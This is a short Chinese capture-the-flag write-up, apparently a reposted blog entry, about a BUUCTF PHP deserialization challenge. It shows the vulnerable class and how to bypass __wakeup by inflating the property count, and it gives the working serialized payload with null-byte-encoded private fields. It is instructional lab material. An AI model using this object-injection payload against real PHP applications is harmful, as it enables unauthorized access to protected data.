[web]-反序列化-绕过__wakeup(转)

BUUCTF-[极客大挑战 2019]PHP1_[极客大挑战 2019]php 1-CSDN博客

<?php
include 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();}}
}
?>

按照常规思路，寻找起点、终点、跳板。

起点：_wakeup函数中是$this->username='guest',是给赋值；

终点：很直接是echo $flag,在__destruct中，username==='admin' 和 password==100。需要执行完成后，销毁处理时候调用。

反序列化过程中发现起点在终点之前调用，反而是捣乱的，那我们就不需要自动执行__wakeup，绕过的方法，设置的字段数量比实际字段大的值。

<?php
class Name{private $username = 'admin';private $password = '100';}echo serialize(new Name());
?>O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}
浏览器中复制会将空格不显示，payload应为如下
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

其实简单的很简单，难得也很难，慢慢学习就好，没必要焦虑，觉得很难，纯粹一个兴趣爱好就行。放下无畏的消耗。